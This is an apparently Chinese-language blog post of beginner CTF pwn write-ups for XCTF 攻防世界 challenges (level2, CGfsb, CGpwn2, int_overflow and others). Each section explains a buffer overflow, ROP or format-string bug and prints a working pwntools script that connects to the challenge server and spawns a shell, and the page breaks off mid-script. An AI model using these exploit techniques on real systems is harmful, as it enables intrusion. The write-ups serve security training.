<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=6.7.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.7.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.7.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.7.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="参考的一系列文章： https://blog.csdn.net/weixin_44319142/article/details/89077831感谢！后面每题也根据不同的writeup写出来的 get_shell直接运行就可以了，看代码就发现会直接运行system函数，所以直接运行就ok直接拿到权限了，看来还是要写 exp，远程连接下cyberpeace{057e59b4709123764babf">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界-新手">
<meta property="og:url" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="参考的一系列文章： https://blog.csdn.net/weixin_44319142/article/details/89077831感谢！后面每题也根据不同的writeup写出来的 get_shell直接运行就可以了，看代码就发现会直接运行system函数，所以直接运行就ok直接拿到权限了，看来还是要写 exp，远程连接下cyberpeace{057e59b4709123764babf">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/get_shell-1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/leve2-2.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/leve2-1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/leve2-bin.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/leve2-system.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/leve2-l2py.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/leve2-l2py.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/level0-1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/hello-1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/hello-2.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/hello-3.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/born-1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/born-2.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/CG-1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/CG-T.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/CG-2.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/CG-3.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/cgpwn2-1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/cgpwn2-2.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/int_overflow-1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/int_overflow-2.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/int_overflow-flag.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/string-1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/string-3.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/string-4.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/string-2.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/string-5.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/string-6.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/string-7.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/string-8.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/guess_num-1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/guess_num-2.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/guess_num-3.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/guess_num-1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/level3-1.GIF">
<meta property="og:updated_time" content="2019-09-29T12:07:48.194Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="攻防世界-新手">
<meta name="twitter:description" content="参考的一系列文章： https://blog.csdn.net/weixin_44319142/article/details/89077831感谢！后面每题也根据不同的writeup写出来的 get_shell直接运行就可以了，看代码就发现会直接运行system函数，所以直接运行就ok直接拿到权限了，看来还是要写 exp，远程连接下cyberpeace{057e59b4709123764babf">
<meta name="twitter:image" content="http://betterlh.github.io/2019/08/17/攻防世界-新手/get_shell-1.GIF">






  <link rel="canonical" href="http://betterlh.github.io/2019/08/17/攻防世界-新手/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>攻防世界-新手 | Hexo</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Startseite</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>Über</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>Kategorien</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archiv</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-schedule">

    
    
    
      
    

    

    <a href="/schedule/" rel="section"><i class="menu-item-icon fa fa-fw fa-calendar"></i> <br>Schedule</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://betterlh.github.io/2019/08/17/攻防世界-新手/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="lh">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">攻防世界-新手

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Veröffentlicht am</span>
              

              
                
              

              <time title="Post created: 2019-08-17 15:08:23" itemprop="dateCreated datePublished" datetime="2019-08-17T15:08:23+08:00">2019-08-17</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Updated at: 2019-09-29 20:07:48" itemprop="dateModified" datetime="2019-09-29T20:07:48+08:00">2019-09-29</time>
              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">in</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/pwn/" itemprop="url" rel="index"><span itemprop="name">pwn</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             Views:  
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>参考的一系列文章：</p>
<p><a href="https://blog.csdn.net/weixin_44319142/article/details/89077831" target="_blank" rel="noopener">https://blog.csdn.net/weixin_44319142/article/details/89077831</a><br>感谢！<br>后面每题也根据不同的writeup写出来的</p>
<h1 id="get-shell"><a href="#get-shell" class="headerlink" title="get_shell"></a>get_shell</h1><p>直接运行就可以了，看代码就发现会直接运行system函数，所以直接运行就ok<br><img src="/2019/08/17/攻防世界-新手/get_shell-1.GIF" alt="checksec"><br>直接拿到权限了，看来还是要写 exp，远程连接下<br>cyberpeace{057e59b4709123764babf99e2f5422c5}</p>
<p>–·</p>
<h1 id="level2-NX-ROP入门"><a href="#level2-NX-ROP入门" class="headerlink" title="level2 (NX-ROP入门)"></a>level2 (NX-ROP入门)</h1><p>参考：</p>
<p><a href="https://bbs.pediy.com/thread-251334.htm" target="_blank" rel="noopener">[原创]XCTF攻防世界 level2</a><br><a href="https://blog.csdn.net/weixin_44319142/article/details/89107325" target="_blank" rel="noopener">攻防世界——pwn（2）</a><br><a href="https://www.jianshu.com/p/4d7dc3d0df86" target="_blank" rel="noopener">level2</a></p>
<h2 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h2><p>题目比较简单</p>
<p>只开了NX，函数也就一个，并且有read函数，存在溢出。<br>可以通过<br><img src="/2019/08/17/攻防世界-新手/leve2-2.GIF" alt="leve2-l2py"><br><img src="/2019/08/17/攻防世界-新手/leve2-1.GIF" alt="leve2-l2py"><br>在IDA中，找到字符串窗口，可以搜索到“/bin/sh”的地址。<br><img src="/2019/08/17/攻防世界-新手/leve2-bin.GIF" alt="leve2-l2py"><br>因为本身有system函数，也能找到sysytem函数的地址。这就为解题减轻难度。<br><img src="/2019/08/17/攻防世界-新手/leve2-system.GIF" alt="leve2-l2py"><br>还有就是填充的长度，可以通过IDA中的【ebp-88h】知道栈空间为88h再加上ebp的4（32位下），所以填充大小就是88h+4</p>
<p>原理方面就是，想办法让他调用system(“/bin/sh”)<br>payload：  填充数据+p32（system_addr）+p32(sys的返回地址，实际上无所谓)+p32(/bin/sh作为sys的参数)<br>即：我们可以构造一个system(“/bin/sh”)的伪栈帧，vulnerable_function()执行结束后返回到我们构造的伪栈帧去执行system(“bin/sh”)，这样就可以获取shell。（需要注意一点，因为我们的目的是通过system(“bin/sh”)来获取shell，所以函数执行完后的返回地址可以任意。）</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><h3 id="l2-py"><a href="#l2-py" class="headerlink" title="l2.py"></a>l2.py</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">![leve2-level2py](D:\blog\betterlh\source\_posts\攻防世界-新手\leve2-level2py.GIF)from pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">"debug"</span></span><br><span class="line">system_addr=<span class="number">0x08048320</span></span><br><span class="line">bin_sh=<span class="number">0x0804A024</span></span><br><span class="line">p=process(<span class="string">"./level2"</span>)</span><br><span class="line">p=remote(<span class="string">"111.198.29.45"</span>,<span class="number">59415</span>)</span><br><span class="line">p.recvline()</span><br><span class="line">payload=<span class="string">"A"</span>*<span class="number">0x88</span>+<span class="string">"A"</span>*<span class="number">4</span>+p32(system_addr)+p32(<span class="number">0xdeedbeef</span>)+p32(bin_sh)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/17/攻防世界-新手/leve2-l2py.GIF" alt="leve2-l2py"></p>
<h3 id="level2-py"><a href="#level2-py" class="headerlink" title="level2.py"></a>level2.py</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">#! /usr/bin/env python</span><br><span class="line"># -*- coding:utf<span class="number">-8</span> -*-</span><br><span class="line">from pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = 'debug'</span><br><span class="line"> </span><br><span class="line">elf = ELF('./level2')</span><br><span class="line">sys_addr = elf.symbols['system']</span><br><span class="line">sh_addr = elf.search('/bin/sh').next()</span><br><span class="line"> </span><br><span class="line">payload = <span class="string">'A'</span> * (<span class="number">0x88</span> + <span class="number">0x4</span>) + p32(sys_addr) +     p32(<span class="number">0xdeadbeef</span>) + p32(sh_addr)</span><br><span class="line"> </span><br><span class="line">io = remote(<span class="string">"111.198.29.45"</span>,<span class="number">41527</span>)</span><br><span class="line">io.sendlineafter(<span class="string">"Input:\n"</span>,payload)</span><br><span class="line">io.interactive()</span><br><span class="line">io.close()</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/17/攻防世界-新手/leve2-l2py.GIF" alt="leve2-l2py"></p>
<h2 id="补充：无-bin-sh"><a href="#补充：无-bin-sh" class="headerlink" title="补充：无/bin/sh"></a>补充：无/bin/sh</h2><p>补充一下，如果里面没有/bin/sh要自己写入的话</p>
<p>利用read函数写入”/bin/sh”的重点是构造这个payload模块：</p>
<p>padding1 + address of read + address of system + p32(0)+p32(addr_bss)+p32(10)</p>
<p>其中，address of system为read函数调用完后的返回地址，p32(0)，p32(addr_bss)，p32(10)为传给read函数的三个参数，p32(addr_bss)将存入”/bin/sh\x00”。</p>
<p>原文链接：<a href="https://blog.csdn.net/weixin_44319142/article/details/89107325" target="_blank" rel="noopener">https://blog.csdn.net/weixin_44319142/article/details/89107325</a></p>
<p>如果是64位的话就不一样了<br>同样可以利用IDA来查找system的地址以及/bin/sh的地址</p>
<p><a href="https://www.jianshu.com/p/f3ebf8a360f0" target="_blank" rel="noopener">NX机制及绕过策略-ROP64位</a><br><a href="https://www.jianshu.com/p/4d7dc3d0df86" target="_blank" rel="noopener">level2</a><br><a href="https://blog.csdn.net/qq_44832048/article/details/97263868" target="_blank" rel="noopener">攻防世界level2 x_64位</a></p>
<hr>
<h1 id="level0"><a href="#level0" class="headerlink" title="level0"></a>level0</h1><p><img src="/2019/08/17/攻防世界-新手/level0-1.GIF" alt="checksec"><br>只有NX，64位</p>
<p>看代码，没啥东西，一个write一个read。存在system</p>
<p>exp<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">from pwn <span class="keyword">import</span> *</span><br><span class="line">p = process('./level0')</span><br><span class="line"><span class="meta"># p = remote(<span class="meta-string">"111.198.29.45"</span>,<span class="meta-string">"31008"</span>)</span></span><br><span class="line">call_system = <span class="number">0x400596</span></span><br><span class="line">payload = <span class="number">0x88</span>*<span class="string">'a'</span> + p64(call_system)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<hr>
<h1 id="hello-pwn"><a href="#hello-pwn" class="headerlink" title="hello_pwn"></a>hello_pwn</h1><p><img src="/2019/08/17/攻防世界-新手/hello-1.GIF" alt="checksec"><br>checksec<br>只有NX，可以尝试64位NX绕过</p>
<p>看到代码里 有个if条件，估计是从这里入手<br><img src="/2019/08/17/攻防世界-新手/hello-2.GIF" alt="checksec"><br>可以看到只要满足if条件，就可以获取到flag<br><img src="/2019/08/17/攻防世界-新手/hello-3.GIF" alt="checksec"><br>可以看出，这个地址和上面read函数的参数连着的，只差4，所以填充4就好</p>
<p>exp<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#! /usr/bin/env python</span><br><span class="line"># -*- coding:utf<span class="number">-8</span> -*-</span><br><span class="line">from pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = 'debug'</span><br><span class="line"> </span><br><span class="line">elf = ELF('./hello_pwn')</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'A'</span> *<span class="number">4</span> + p32(<span class="number">1853186401</span>) </span><br><span class="line"> </span><br><span class="line">io = remote(<span class="string">"111.198.29.45"</span>,<span class="number">41431</span>)</span><br><span class="line">io.sendlineafter(<span class="string">"bof"</span>,payload)</span><br><span class="line">io.interactive()</span><br><span class="line">io.close()</span><br></pre></td></tr></table></figure></p>
<hr>
<h1 id="born"><a href="#born" class="headerlink" title="born"></a>born</h1><p>64位<br><img src="/2019/08/17/攻防世界-新手/born-1.GIF" alt="checksec"></p>
<p>这题看它的伪代码就可以知道要让v5这个值等于对应的数值就可以了。但是他在前面又不让你等于这个数，怎么办?<br>认真看可以发现他是先输入v5的值，再输入v4的值，那么一开始v5的值不等于1926就好了，然后用v4溢出覆盖v5（地址刚好连续，只差8），这个时候就可以满足条件了<br>通过IDA 可以发现这两个值的地址（var20和var18）<br><img src="/2019/08/17/攻防世界-新手/born-2.GIF" alt="checksec"></p>
<p>exp：<br><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! /usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"><span class="comment">#p = process("./born")</span></span><br><span class="line">p=remote(<span class="string">"111.198.29.45"</span>,<span class="number">59781</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Birth?"</span>,str(<span class="number">1999</span>))</span><br><span class="line">payload=<span class="string">"A"</span>*<span class="number">8</span>+p32(<span class="number">1926</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"What's Your Name?\n"</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">'111.198.29.45'</span>,<span class="number">35721</span>)</span><br><span class="line">payload=<span class="string">'a'</span>*<span class="number">8</span>+p64(<span class="number">1926</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Your Birth?'</span>)</span><br><span class="line">p.sendline(<span class="string">'1999'</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="CGfsb"><a href="#CGfsb" class="headerlink" title="CGfsb"></a>CGfsb</h1><p>这是一道格式字符串漏洞<br><img src="/2019/08/17/攻防世界-新手/CG-1.GIF" alt="checksec"><br><img src="/2019/08/17/攻防世界-新手/CG-T.GIF" alt="checksec"><br>只要pwnme=8，就会cat flag<br>这里有个printf格式化字符串漏洞，利用这个可以将pwnme（地址直接用IDA就找到了）的值给覆盖成题目需要的值8<br><img src="/2019/08/17/攻防世界-新手/CG-2.GIF" alt="checksec"><br>用gdb调试，发现它的位置在11（实际上是10因为第一个是我们的格式化字符串，这个是不会打印出来的）<br>payload：<br>pwnme 的地址占了4位数，然后我们在输入4个a就有8位了。<br>exp：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">"debug"</span></span><br><span class="line">elf=ELF(<span class="string">"./CGfsb"</span>)</span><br><span class="line"><span class="comment">#p=process("./CGfsb")</span></span><br><span class="line"></span><br><span class="line">p=remote(<span class="string">"111.198.29.45"</span>,<span class="number">54477</span>)</span><br><span class="line">pwnme=<span class="number">0x0804a068</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"name:"</span>,<span class="string">"aaaa"</span>)</span><br><span class="line"></span><br><span class="line">payload=p32(pwnme)+<span class="string">'aaaa%10$n'</span></span><br><span class="line">p.sendlineafter(<span class="string">"please:"</span>,payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<p><img src="/2019/08/17/攻防世界-新手/CG-3.GIF" alt="checksec"></p>
<h1 id="CGpwn2"><a href="#CGpwn2" class="headerlink" title="CGpwn2"></a>CGpwn2</h1><p>这题好像是一个简单的溢出<br>有用的代码是这里<br><img src="/2019/08/17/攻防世界-新手/cgpwn2-1.GIF" alt="checksec"><br>这里有个fget函数，以及存在漏洞的gets函数。<br>这里的name是全局变量，name 的地址0804A080<br>可以看到这题有system函数，但是没有/bin/sh，要想办法构造，这里可以直接写道全局变量name中，到时候system函数调用时，再用它的首地址作为参数就行了。<br>利用get的溢出，让eip为system的地址，这里可以使用pattern工具来找溢出点IDA上可以看到s是ebp-26h也可以知道是26h+4=42。<br>exp：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!usr/bin/python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"><span class="comment">#io = remote("111.198.29.45",39409)</span></span><br><span class="line">io = process(<span class="string">"./cgpwn2"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">elf=ELF(<span class="string">"./cgpwn2"</span>)  </span><br><span class="line"></span><br><span class="line">sys_addr=elf.symbols[<span class="string">'system'</span>]    </span><br><span class="line"><span class="comment">#sys_addr = 0x08048420</span></span><br><span class="line">io.recvuntil(<span class="string">"your name"</span>)</span><br><span class="line">io.sendline(<span class="string">"/bin/sh"</span>)</span><br><span class="line">bin_sh_addr=<span class="number">0x0804a080</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">'a'</span>*<span class="number">42</span>+p32(sys_addr)+p32(<span class="number">0</span>)+p32(bin_sh_addr)</span><br><span class="line">io.recvuntil(<span class="string">"leave some message here:"</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure></p>
<p><img src="/2019/08/17/攻防世界-新手/cgpwn2-2.GIF" alt="checksec"></p>
<hr>
<h1 id="int-overflow"><a href="#int-overflow" class="headerlink" title="int_overflow"></a>int_overflow</h1><p><img src="/2019/08/17/攻防世界-新手/int_overflow-1.GIF" alt="checksec"><br>惯例看下，32位的，有NX</p>
<p><img src="/2019/08/17/攻防世界-新手/int_overflow-2.GIF" alt="checksec"><br>关键地方在这，前面的没有用。<br>从题目名字我们就可以猜到是整数溢出。结合代码中的strlen（s）这个函数。<br>我们需要进入到else里，所以我们要让输入的长度在4-8之间。那应该是要利用溢出。<br>最后一个   <code>result = strcpy(&amp;dest, s);</code> 应该要利用上。感觉是利用最后一个溢出，调用system函数，毕竟程序里有，但是没有/bin/sh，而且没有read函数让你读进去<br>看题解发现，没有找到一个重要的函数，在函数窗口，有一个 what_is_this这个函数。点开一看，这就是flag所在。所以想办法调用这个函数就结束了。<br>通过<code>char dest; // [esp+4h] [ebp-14h]</code>,溢出点是14h+4=24。eip地址写成我们需要的what_is_this函数的4位数地址<br>那我们此时输入的数已经有28（24+4）个了，已经不满足if条件，所以我们就要让字节数溢出<br>计算需要填充的长度：s的长度v3<code>unsigned __int8 v3; // [esp+Fh] [ebp-9h]</code> v3最大值为2的8次方-1=255.260由于溢出（无符号数回绕）实际上是4.因此我们实际的payload总共长度为260-265.   以260为例：后面需要填充的字节就为260-28<br>exp：<br><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! /usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">"debug"</span></span><br><span class="line"><span class="comment">#elf=ELF("./int_over_flow")</span></span><br><span class="line"><span class="comment">#p=process("int_overflow")</span></span><br><span class="line">p=remote(<span class="string">"111.198.29.45"</span>,<span class="number">56199</span>)</span><br><span class="line"></span><br><span class="line">system_addr=<span class="number">0x0804868b</span></span><br><span class="line">p.sendlineafter(<span class="string">"Your choice:"</span>,<span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Please input your username:"</span>,<span class="string">"aaaa"</span>)</span><br><span class="line"><span class="comment">##到达目标函数，进入正题</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload=<span class="string">"A"</span>*<span class="number">24</span>+p32(system_addr)+<span class="string">'A'</span>*(<span class="number">260</span><span class="number">-24</span><span class="number">-4</span>)  <span class="comment">##260~265</span></span><br><span class="line">p.sendlineafter(<span class="string">"Please input your 